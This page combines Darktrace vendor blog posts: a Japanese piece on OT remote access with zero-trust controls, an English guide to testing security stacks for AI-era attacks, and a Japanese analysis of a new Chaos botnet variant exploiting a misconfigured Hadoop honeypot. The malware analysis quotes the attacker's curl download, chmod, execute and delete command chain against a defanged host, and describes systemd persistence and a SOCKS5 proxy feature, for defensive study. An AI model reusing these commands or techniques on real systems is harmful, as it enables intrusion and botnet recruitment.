ブログ
/
OT
/
November 20, 2025

ゼロトラストコントロールとAI駆動の検知でOTリモートアクセスを管理

本稿では、現代のOTが可視性だけに頼ることはできない理由、そしてゼロトラストアクセスコントロールとAI駆動のビヘイビア検知と組み合わせることにより、リアルタイムの監視、アカウンタビリティ、安全なリモートアクセスを、オペレーションを混乱させることなく実現する方法について、今後の展望も見据えて解説します。
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Pallavi Singh
Product Marketing Manager, OT Security & Compliance
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
20
Nov 2025

IT-OT統合へのシフト

近年、産業環境は相互接続が進み外部との連携により依存するようになりました。その結果、真にエアギャップされたOTシステムの現実味は薄れています。特に、OEMが管理するアセットを使用している、レガシー装置に対してリモート診断が必要となる、あるいは第三者のインテグレーターが頻繁に接続するケースなどでは難しいでしょう。

こうした連携は、デジタル変革戦略に基づくもの、あるいは運用効率目標のため、いずれの場合においてもOT環境をより接続された、より自動化された、よりITシステムと絡み合ったものにしつつあります。このような統合により新たな可能性が開かれますが、同時にOT環境は、従来のOTアーキテクチャが耐えるように設計されていないような、さまざまなリスクにさらされることになります。

最新化により生まれるギャップと可視性だけでは不十分な理由

最新化への取り組みにより新たなテクノロジーが産業環境にも導入され、IT環境とOT環境の統合とともに、可視性の欠如も生まれました。しかし、可視性を取り戻すことはスタート地点にすぎません。可視性は何が接続されているかを教えてくれるだけで、アクセスをどのように管理すべきかを教えてはくれません。そしてここがITとOTの分断が避けられなくなるポイントです。

ITではうまく機能するセキュリティ戦略もOTではしばしば不十分なことがあります。OT環境ではわずかな失敗が環境への危険性、安全に関する事故、あるいは多大なコストを伴う稼働の停止などにつながるからです。さらに、安全なアクセス、分割の徹底、説明責任などを求める法規制の高まりからの圧力が加わると、可視性だけではもはや不十分であるということが明確になります。産業環境に今必要なのは、精密性です。そこではコントロールが必要です。そして、オペレーションを中断させることなくその両方を実現する必要があります。それには、アイデンティティベースのアクセス制御、リアルタイムのセッション監視、そして継続的なビヘイビア検知が必要となります。

監視されていないリモートアクセスによるリスク

このリスクは、アセットの故障をトラブルシューティングするためにOEMが緊急にアクセスを必要とする場合など、重大なタイミングで現れます。

限られた時間というプレッシャーのなかで、アクセス権限はしばしば最小限の検証ですばやく付与され、決められたプロセスが省略されることがあります。一旦中に入れば、コマンドの実行、設定の変更、あるいはネットワーク内で水平移動するなど、ユーザーのアクションに対するリアルタイムの監視はないケースがほとんどです。こうしたアクションは多くの場合記録されず、あるいは何かが壊れるまで気づかれません。問題が起こると、チームは断片的なログをつなぎ合わせる作業やインシデント後のフォレンジック作業に追われますが、説明責任の経路は明確ではありません。

アップタイムが決定的に重要であり安全性が譲れない環境においてこのレベルの不透明性では、まったく持続可能ではありません。

可視性のギャップ:誰が何を、いつ行っているか?

私たちが直面している根本的な問題は、誰がアクセス権を持っているかということと、そのアクセス権で何が行われているかという現実がつながっていないことです。  

従来のアクセス管理ツールは認証情報を検証し、入り口を制限するかもしれませんが、セッション中のアクティビティについてリアルタイムの可視性を提供することは稀です。さらに、期待される振る舞いと、侵害、誤使用、設定間違いのかすかな兆候の違いを見分けられるものはさらに少ないでしょう。  

その結果、OTチームとセキュリティチームはしばしば、問題の最も重要なカギとなる、意図と動作が見えない状況に置かれます。

ゼロトラストコントロールとAI駆動の検知でギャップを解消

OTでのリモートアクセスを管理することは、接続権限を付与するだけの問題ではもはやありません。厳密なアクセスパラメーターを徹底すると同時に、異常な振る舞いを継続的に監視することが必要です。これには、精密なアクセスコントロールと、インテリジェントかつリアルタイムの検知という2つの側面からのアプローチが必要です。

ゼロトラストアクセスコントロールが基盤となります。アイデンティティベースの、ジャストインタイム型のアクセス権を適用することにより、OT環境において、外部ベンダーやリモートユーザーが明示的に操作を承認されたシステムに対してのみ、そして必要な時間のみアクセスできるよう徹底できます。これらのコントロールのは、特定のデバイス、コマンド、あるいは機能へのアクセスに制限できるだけの細かさが必要です。これらの原則をPurdueモデル全体に一貫して適用することにより、OT環境を過剰なリスクにさらしてしまうキャッチオール式のVPNトンネル、ジャンプサーバー、そして脆いファイアウォール例外などへの依存を解消することができます。

アクセスコントロールは方程式の1部にすぎない

Darktrace / OT は継続的なAI駆動のビヘイビア検知でゼロトラストコントロールを補強します。静的なルールや事前定義済みのシグネチャに依存する代わりに、Darktraceは自己学習型AIを使用して、あらゆるデバイス、プロトコル、ユーザーに渡る環境全体で何が"正常”かについての、リアルタイムの、変化し続ける理解を構築します。これにより、微細な設定ミス、認証情報の間違った使用、あるいは水平移動を、後から知るのではなく発生と同時にリアルタイムに検知することができます。

ユーザーのアイデンティティとセッション内のアクティビティを、ビヘイビア分析と相関付けることによりDarktraceは全体像を明らかにし、誰がどのシステムにアクセスしたか、どのようなアクションを実行したか、それらのアクションはこれまでの通常状態と比較してどうか、そして逸脱が発生したかどうかを知ることができます。リモートアクセスセッションに関連する当て推量を取り除き、明確な、コンテキストを含めた情報を提供します。

重要な点は、Darktraceがオペレーション内のノイズと本物のサイバー脅威に関連した異常を区別することです。CVEアラートから日常的なアクティビティまですべてを1つのストリームにまとめてしまう他のツールとは異なり、Darktraceは正しいリモートアクセス動作とミスや乱用の可能性を区別します。つまり、組織はコンプライアンスの観点からアクセスを監査できるとともに、セッションがもしエクスプロイトされていれば、その不正な使用は、高確度なサイバー脅威に関連したアラートとして確認できることを意味します。このアプローチはコントロールを補完するものとして利用することができ、もしアクセス権が過剰に拡大されている、あるいは間違って利用されている場合にも、その挙動を可視化し、それに対するアクションが可能です。

たとえば、セッションにおいて、普段とは異なるコマンドシーケンス、新たな水平移動経路、あるいはスケジュールされた時間帯以外のアクティビティが発生するなど、学習したベースラインを逸脱した場合、Darktraceは即座にフラグを立てることができます。これらの情報を基に、人手による調査を開始する、あるいはアクセス権のはく奪やセッション隔離などポリシーに応じて自動的にアクションをトリガーするなどが可能です。

この多層的なアプローチにより、リアルタイムの意思決定が可能になり、中断のないオペレーションが確保され、重要な作業を遅らせたりワークフローを中断したりすることなくあらゆるリモートアクティビティに対して完全な説明責任を担保することができます。

ゼロトラストアクセスとAI駆動の監視の組み合わせ:

  • きめ細かいアクセス適用: ゼロトラスト原則に従いコンプライアンスの要件を満たす、ロールベースの、ジャストインタイムのアクセス。 
  • コンテキストを加えた脅威検知: 自己学習型AIが異常なOT動作をリアルタイムに検知し、脅威をアクセスイベントとユーザーアクティビティに結びつける。 
  • 自動化されたセッション管理: 動作の異常によってアラートや自動制御をトリガーすることができ、アップタイムを維持しつつ封じ込めまでの時間を短縮。
  • Purdueレイヤー全体に渡る完全な可視性: 相関付けされたデータにより、IT、OTレイヤー全体にわたりリモートアクセスイベントをデバイスレベルの動作と結びつけることが可能。
  • スケーラブルかつ受動的な監視: 動作を受動的に学習することによりレガシーシステムやエアギャップされた環境全体をカバーすることが可能、シグネチャやエージェント、侵入型スキャンは必要なし。

妥協のない完全なセキュリティ

オペレーションの敏捷性かそれともセキュリティコントロールか、あるいは可視性かそれとも簡潔性か、これらのどちらかを選ぶ必要はもうありません。ゼロトラストアプローチをリアルタイムのAI検知で強化することにより、権限と動作の両方を認識し、産業オペレーションの現実に即した、多様な環境にスケール可能な、安全なリモートアクセスを実現することができます。

重要インフラの保護において、検知を伴わないアクセスはリスクであり、アクセスコントロールを伴わない検知は不完全だからです。

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Pallavi Singh
Product Marketing Manager, OT Security & Compliance

More in this series

No items found.

Blog

/

AI

/

April 10, 2026

How to Secure AI and Find the Gaps in Your Security Operations

Default blog imageDefault blog image

What “securing AI” actually means (and doesn’t)

Security teams are under growing pressure to “secure AI” at the same pace which businesses are adopting it. But in many organizations, adoption is outpacing the ability to govern, monitor, and control it. When that gap widens, decision-making shifts from deliberate design to immediate coverage. The priority becomes getting something in place, whether that’s a point solution, a governance layer, or an extension of an existing platform, rather than ensuring those choices work together.

At the same time, AI governance is lagging adoption. 37% of organizations still lack AI adoption policies, shadow AI usage across SaaS has surged, and there are notable spikes in anomalous data uploads to generative AI services.  

First and foremost, it’s important to recognize the dual nature of AI risk. Much of the industry has focused on how attackers will use AI to move faster, scale campaigns, and evade detection. But what’s becoming just as significant is the risk introduced by AI inside the organization itself. Enterprises are rapidly embedding AI into workflows, SaaS platforms, and decision-making processes, creating new pathways for data exposure, privilege misuse, and unintended access across an already interconnected environment.

Because the introduction of complex AI systems into modern, hybrid environments is reshaping attacker behavior and exposing gaps between security functions, the challenge is no longer just having the right capabilities in place but effectively coordinating prevention, detection, investigation, response, and remediation together. As threats accelerate and systems become more interconnected, security depends on coordinated execution, not isolated tools, which is why lifecycle-based approaches to governance, visibility, behavioral oversight, and real-time control are gaining traction.

From cloud consolidation to AI systems what we can learn

We have seen a version of AI adoption before in cloud security. In the early days, tooling fragmented into posture, workload/runtime, identity, data, and more. Gradually, cloud security collapsed into broader cloud platforms. The lesson was clear: posture without runtime misses active threats; runtime without posture ignores root causes. Strong programs ran both in parallel and stitched the findings together in operations.  

Today’s AI wave stretches that lesson across every domain. Adversaries are compressing “time‑to‑tooling” using LLM‑assisted development (“vibecoding”) and recycling public PoCs at unprecedented speed. That makes it difficult to secure through siloed controls, because the risk is not confined to one layer. It emerges through interactions across layers.

Keep in mind, most modern attacks don’t succeed by defeating a single control. They succeed by moving through the gaps between systems faster than teams can connect what they are seeing. Recent exploitation waves like React2Shell show how quickly opportunistic actors operationalize fresh disclosures and chain misconfigurations to monetize at scale.

In the React2Shell window, defenders observed rapid, opportunistic exploitation and iterative payload diversity across a broad infrastructure footprint, strains that outpace signature‑first thinking.  

You can stay up to date on attacker behavior by signing up for our newsletter where Darktrace’s threat research team and analyst community regularly dive deep into threat finds.

Ultimately, speed met scale in the cloud era; AI adds interconnectedness and orchestration. Simple questions — What happened? Who did it? Why? How? Where else? — now cut across identities, SaaS agents, model/service endpoints, data egress, and automated actions. The longer it takes to answer, the worse the blast radius becomes.

The case for a platform approach in the age of AI

Think of security fusion as the connective tissue that lets you prevent, detect, investigate, and remediate in parallel, not in sequence. In practice, that looks like:

  1. Unified telemetry with behavioral context across identities, SaaS, cloud, network, endpoints, and email—so an anomalous action in one plane automatically informs expectations in others. (Inside‑the‑SOC investigations show this pays off when attacks hop fast between domains.)  
  1. Pre‑CVE and “in‑the‑wild” awareness feeding controls before signatures—reducing dwell time in fast exploitation windows.  
  1. Automated, bounded response that can contain likely‑malicious actions at machine speed without breaking workflows—buying analysts time to investigate with full context. (Rapid CVE coverage and exploit‑wave posts illustrate how critical those first minutes are.)  
  1. Investigation workflows that assume AI is in the loop—for both defenders and attackers. As adversaries adopt “agentic” patterns, investigations need graph‑aware, sequence‑aware reasoning to prioritize what matters early.

This isn’t theoretical. It’s reflected in the Darktrace posts that consistently draw readership: timely threat intel with proprietary visibility and executive frameworks that transform field findings into operating guidance.  

The five questions that matter (and the one that matters more)

When alerted to malicious or risky AI use, you’ll ask:

  1. What happened?
  1. Who did it?
  1. Why did they do it?
  1. How did they do it?
  1. Where else can this happen?

The sixth, more important question is: How much worse does it get while you answer the first five? The answer depends on whether your controls operate in sequence (slow) or in fused parallel (fast).

What to watch next: How the AI security market will likely evolve

Security markets tend to follow a familiar pattern. New technologies drive an initial wave of specialized tools (posture, governance, observability) each focused on a specific part of the problem. Over time, those capabilities consolidate as organizations realize the new challenge is coordination.

AI is accelerating the shift of focus to coordination because AI-powered attackers can move faster and operate across more systems at once. Recent exploitation waves show exactly this. Adversaries can operationalize new techniques and move across domains, turning small gaps into full attack paths.

Anticipate a continued move toward more integrated security models because fragmented approaches can’t keep up with the speed and interconnected nature of modern attacks.

Building the Groundwork for Secure AI: How to Test Your Stack’s True Maturity

AI doesn’t create new surfaces as much as it exposes the fragility of the seams that already exist.  

Darktrace’s own public investigations consistently show that modern attacks, from LinkedIn‑originated phishing that pivots into corporate SaaS to multi‑stage exploitation waves like BeyondTrust CVE‑2026‑1731 and React2Shell, succeed not because a single control failed, but because no control saw the whole sequence, or no system was able to respond at the speed of escalation.  

Before thinking about “AI security,” customers should ensure they’ve built a security foundation where visibility, signals, and responses can pass cleanly between domains. That requires pressure‑testing the seams.

Below are the key integration questions and stack‑maturity tests every organization should run.

1. Do your controls see the same event the same way?

Integration questions

  • When an identity behaves strangely (impossible travel, atypical OAuth grants), does that signal automatically inform your email, SaaS, cloud, and endpoint tools?
  • Do your tools normalize events in a way that lets you correlate identity → app → data → network without human stitching?

Why it matters

Darktrace’s public SOC investigations repeatedly show attackers starting in an unmonitored domain, then pivoting into monitored ones, such as phishing on LinkedIn that bypassed email controls but later appeared as anomalous SaaS behavior.

If tools can’t share or interpret each other's context, AI‑era attacks will outrun every control.

Tests you can run

  1. Shadow Identity Test
  • Create a temporary identity with no history.
  • Perform a small but unusual action: unusual browser, untrusted IP, odd OAuth request.
  • Expected maturity signal: other tools (email/SaaS/network) should immediately score the identity as high‑risk.
  1. Context Propagation Test
  • Trigger an alert in one system (e.g., endpoint anomaly) and check if other systems automatically adjust thresholds or sensitivity.
  • Low maturity signal: nothing changes unless an analyst manually intervenes.

2. Does detection trigger coordinated action, or does everything act alone?

Integration questions

  • When one system blocks or contains something, do other systems automatically tighten, isolate, or rate‑limit?
  • Does your stack support bounded autonomy — automated micro‑containment without broad business disruption?

Why it matters

In public cases like BeyondTrust CVE‑2026‑1731 exploitation, Darktrace observed rapid C2 beaconing, unusual downloads, and tunneling attempts across multiple systems. Containment windows were measured in minutes, not hours.  

Tests you can run

  1. Chain Reaction Test
  • Simulate a primitive threat (e.g., access from TOR exit node).
  • Your identity provider should challenge → email should tighten → SaaS tokens should re‑authenticate.
  • Weak seam indicator: only one tool reacts.
  1. Autonomous Boundary Test
  • Induce a low‑grade anomaly (credential spray simulation).
  • Evaluate whether automated containment rules activate without breaking legitimate workflows.

3. Can your team investigate a cross‑domain incident without swivel‑chairing?

Integration questions

  • Can analysts pivot from identity → SaaS → cloud → endpoint in one narrative, not five consoles?
  • Does your investigation tooling use graphs or sequence-based reasoning, or is it list‑based?

Why it matters

Darktrace’s Cyber AI Analyst and DIGEST research highlights why investigations must interpret structure and progression, not just standalone alerts. Attackers now move between systems faster than human triage cycles.  

Tests you can run

  1. One‑Hour Timeline Build Test
  • Pick any detection.
  • Give an analyst one hour to produce a full sequence: entry → privilege → movement → egress.
  • Weak seam indicator: they spend >50% of the hour stitching exports.
  1. Multi‑Hop Replay Test
  • Simulate an incident that crosses domains (phish → SaaS token → data access).
  • Evaluate whether the investigative platform auto‑reconstructs the chain.

4. Do you detect intent or only outcomes?

Integration questions

  • Can your stack detect the setup behaviors before an attack becomes irreversible?
  • Are you catching pre‑CVE anomalies or post‑compromise symptoms?

Why it matters

Darktrace publicly documents multiple examples of pre‑CVE detection, where anomalous behavior was flagged days before vulnerability disclosure. AI‑assisted attackers will hide behind benign‑looking flows until the very last moment.

Tests you can run

  1. Intent‑Before‑Impact Test
  • Simulate reconnaissance-like behavior (DNS anomalies, odd browsing to unknown SaaS, atypical file listing).
  • Mature systems will flag intent even without an exploit.
  1. CVE‑Window Test
  • During a real CVE patch cycle, measure detection lag vs. public PoC release.
  • Weak seam indicator: your detection rises only after mass exploitation begins.

5. Are response and remediation two separate universes?

Integration questions

  • When you contain something, does that trigger root-cause remediation workflows in identity, cloud config, or SaaS posture?
  • Does fixing a misconfiguration automatically update correlated controls?

Why it matters

Darktrace’s cloud investigations (e.g., cloud compromise analysis) emphasize that remediation must close both runtime and posture gaps in parallel.

Tests you can run

  1. Closed‑Loop Remediation Test
  • Introduce a small misconfiguration (over‑permissioned identity).
  • Trigger an anomaly.
  • Mature stacks will: detect → contain → recommend or automate posture repair.
  1. Drift‑Regression Test
  • After remediation, intentionally re‑introduce drift.
  • The system should immediately recognize deviation from known‑good baseline.

6. Do SaaS, cloud, email, and identity all agree on “normal”?

Integration questions

  • Is “normal behavior” defined in one place or many?
  • Do baselines update globally or per-tool?

Why it matters

Attackers (including AI‑assisted ones) increasingly exploit misaligned baselines, behaving “normal” to one system and anomalous to another.

Tests you can run

  1. Baseline Drift Test
  • Change the behavior of a service account for 24 hours.
  • Mature platforms will flag the deviation early and propagate updated expectations.
  1. Cross‑Domain Baseline Consistency Test
  • Compare identity’s risk score vs. cloud vs. SaaS.
  • Weak seam indicator: risk scores don’t align.

Final takeaway

Security teams should ask be focused on how their stack operates as one system before AI amplifies pressure on every seam.

Only once an organization can reliably detect, correlate, and respond across domains can it safely begin to secure AI models, agents, and workflows.

Continue reading
About the author
Nabil Zoldjalali
VP, Field CISO

Blog

/

/

April 8, 2026

ダークトレースは新しいChaosマルウェア亜種によるクラウドの設定ミスのエクスプロイトを発見

Default blog imageDefault blog image

はじめに

敵対者の行動をリアルタイムに観測するため、ダークトレースは“CloudyPots”と呼ばれるグローバルなハニーポットネットワークを運用しています。CloudyPotsは幅広いサービス、プロトコル、クラウドプラットフォームに渡って悪意あるアクティビティを捕捉するように設計されています。こうしたハニーポットはインターネットに接続されているインフラを狙う脅威のテクニック、ツール、マルウェアについて貴重な情報を提供してくれます。

ダークトレースのハニーポット内で標的とされたソフトウェアの一例は、Apacheが開発したオープンソースフレームワークであり、コンピュータクラスタで大規模なデータセットの分散処理を可能にするHadoopです。ダークトレースのハニーポット環境では、攻撃者がサービス上でリモートコードを実行できるよう、Hadoopインスタンスが意図的に誤設定されています。2026年3月に観測されたサンプルにより、ダークトレースはChaosマルウェアに関連する活動を特定し、詳しく調査することができました。

Chaosマルウェアとは?

Lumen社のBlack Lotus Labsで最初に発見されたChaosは、Goベースのマルウェアです[1]。サンプル内の文字列に中国語の文字が含まれていることや、zh-CNロケールのインジケーターが存在することから、中国起源であると推測されています。コードの重複があることから、ChaosはKaijiボットネットの進化形である可能性が高いと見られます。

Chaosはこれまでルーターを標的としており、主にSSHブルートフォース攻撃やルーターソフトウェアの既知のCVE(共通脆弱性識別子)を通じて拡散します。その後感染したデバイスをDDoS(分散型サービス拒否攻撃)ボットネットや、暗号通貨マイニングに使用します。  

Chaosマルウェア侵害についてのダークトレースの視点

攻撃は脅威アクターがHadoop環境上のエンドポイントに対して新しいアプリケーションを作成するリクエストを送信したことから始まりました。

The initial infection being delivered to the unsecured endpoint.
図1:保護されていないエンドポイントへの最初の感染

これは新しいアプリケーションを定義するもので、最初のコマンドをコンテナ内で実行することがam-container-specセクションのコマンドフィールドで指定されています。これによりいくつかのシェルコマンドが起動されます:

  • curl -L -O http://pan.tenire[.]com/down.php/7c49006c2e417f20c732409ead2d6cc0. - ファイルを攻撃者のサーバーからダウンロードします。この例ではChaosエージェントマルウェア実行形式です。
  • chmod 777 7c49006c2e417f20c732409ead2d6cc0. - すべてのユーザーが読み取り、書き込み、マルウェアを実行できる権限を設定します。
  • ./7c49006c2e417f20c732409ead2d6cc0. - マルウェアを実行します。
  • rm -rf 7c49006c2e417f20c732409ead2d6cc0. - 活動の痕跡を消すためにマルウェアファイルをディスクから削除します。

実際には、このアプリケーションが作成されると、攻撃者が定義したバイナリが攻撃者のサーバーからダウンロードされ、システム上で実行され、その後、フォレンジックデータ収集を防ぐために削除されます。ドメイン pan.tenire[.]com は以前、“Operation Silk Lure”と呼ばれる別のキャンペーンで観測されています。これは悪意のある求人応募履歴書を通じて ValleyRATというリモートアクセス型トロイの木馬(RAT)を配布していました。Chaosと同様に、このキャンペーンでは、偽の履歴書自体を含め、攻撃ステージ全体にわたって大量の漢字が使用されていました。このドメインは107[.]189.10.219に解決されます。これは低コストのVPSサービスを提供することで知られるプロバイダー、BuyVMのルクセンブルク拠点でホストされている仮想プライベートサーバー(VPS)です。

アップデートされたChaosマルウェアサンプルの分析

Chaosはこれまでルーターやその他のエッジデバイスを標的としており、Linuxサーバー環境の侵害は比較的新しい方向性です。ダークトレースがこの侵害で観測したサンプルは64ビットのELFバイナリですが、ルーターのハードウェアの大部分は通常ARM、MIPS、またはPowerPCアーキテクチャで動作し、多くは32ビットです。

この攻撃に使用されたマルウェアのサンプルは、以前のバージョンと比べて著しい再構築が行われています。デフォルトの名前空間は“main_chaos”から単に“main”に変更され、またいくつかの関数が再設計されています。これらの変更が行われていますが、systemdを介して確立される永続化メカニズムや、悪意のあるキープアライブスクリプトが/boot/system.pubに保存されるなど、中心的な特徴は維持されています。

The creation of the systemd persistence service.
図2:systemd 永続化サービスの作成

同様に、DDoS攻撃を実行する関数もこれまで通り存在し、以下のプロトコルを標的とするメソッドが含まれています:

  • HTTP
  • TLS
  • TCP
  • UDP
  • WebSocket

ただし、SSHスプレッダーや脆弱性エクスプロイトなどのいくつかの機能は削除されたようです。さらに、以前はKaijiから継承されたと考えられていたいくつかの機能も変更されており、脅威アクターがマルウェアを書き直したか、大幅にリファクタリングしたことを示唆しています。

このマルウェアの新しい機能はSOCKSプロキシです。マルウェアがコマンド&コントロール(C2)サーバーからStartProxyコマンドを受信すると、攻撃者が制御するTCPポートで待ち受けを開始し、SOCKS5プロキシとして動作します。これにより、攻撃者は侵害されたサーバーを経由してトラフィックをルーティングし、それをプロキシとして使用することが可能になります。この機能にはいくつかの利点があります。被害者のインターネット接続から攻撃を開始できるため、活動が攻撃者ではなく被害者から発生しているように見せかけられること、また侵害されたサーバーからのみアクセス可能な内部ネットワークに移動できる点です。

The command processor for StartProxy. Due to endianness, the string is reversed.
図3:StartProxyのコマンドプロセッサ。エンディアン性のため文字列が反転しています

以前、他のDDoSボットネット、たとえばAisuruなどでは、他のサイバー犯罪者にプロキシサービスを提供するためにピボットしているケースがありました。Chaosの開発者はこの傾向に注目し、同様の機能を追加することで収益化のオプションを拡大、自らのボットネットの機能を強化することにより、他の競合するマルウェア運営者から遅れをとらないようにしたものと思われます。

サンプルには埋め込みドメイン、gmserver.osfc[.]org[.]cnが含まれており、C2サーバーのIPを解決するために使用されていました。本稿執筆の時点ではドメインは70[.]39.181.70に解決され、これは地理位置情報が香港にあるNetLabelGlobalが所有するIPです。

過去には、このドメインは154[.]26.209.250にも解決されており、これは専用サーバーレンタルを提供する低コストVPSプロバイダー、Kurun Cloudが所有していました。マルウェアはコマンドの送信および受信にポート65111を使用しますが、どちらのIPも本稿執筆時点ではこのポート上で接続を受け入れている様子はありませんでした。

主なポイント

Chaosは新しいマルウェアではなく、その継続的進化はサイバー犯罪者がボットネットをさらに拡大し機能を強化しようと努力を重ねていることの現れです。過去に報告されているChaosマルウェアにも、すでに幅広いルーターCVEのエクスプロイト機能が含まれていました。そして最近のLinuxクラウドサーバー脆弱性を狙った進化により、このマルウェアの影響範囲はさらに広がります。

したがって、セキュリティチームがCVEへのパッチを行い、クラウド上で展開されているアプリケーションに対して強固なセキュリティ設定を行うことが重要となります。クラウド市場が成長を続ける一方で、使用できるセキュリティツールが追い付かない状況においてこのことは特に重要な意味を持ちます。

AisuruやChaos等のボットネットがプロキシサービスをコア機能に取り入れる最近の変化は、ボットネットが組織とセキュリティチームにもたらすリスクはもはやDoS攻撃だけではないことを意味します。プロキシにより攻撃者はレート制限を回避し痕跡を隠すことができ、より複雑な形のサイバー犯罪が可能になると同時に、防御者にとっては悪意あるキャンペーンを検知しブロックすることが格段に難しくなります。

担当: Nathaniel Bill (Malware Research Engineer)
編集: Ryan Traill (Content Manager)

侵害インジケーター (IoCs)

ae457fc5e07195509f074fe45a6521e7fd9e4cd3cd43e42d10b0222b34f2de7a - Chaos マルウェアハッシュ

182[.]90.229.95 - 攻撃者 IP

pan.tenire[.]com (107[.]189.10.219) - 悪意あるバイナリをホストしているサーバー

gmserver.osfc[.]org[.]cn (70[.]39.181.70, 154[.]26.209.250) - 攻撃者 C2 サーバー

参考資料

[1] - https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer
あなたのデータ × DarktraceのAI
唯一無二のDarktrace AIで、ネットワークセキュリティを次の次元へ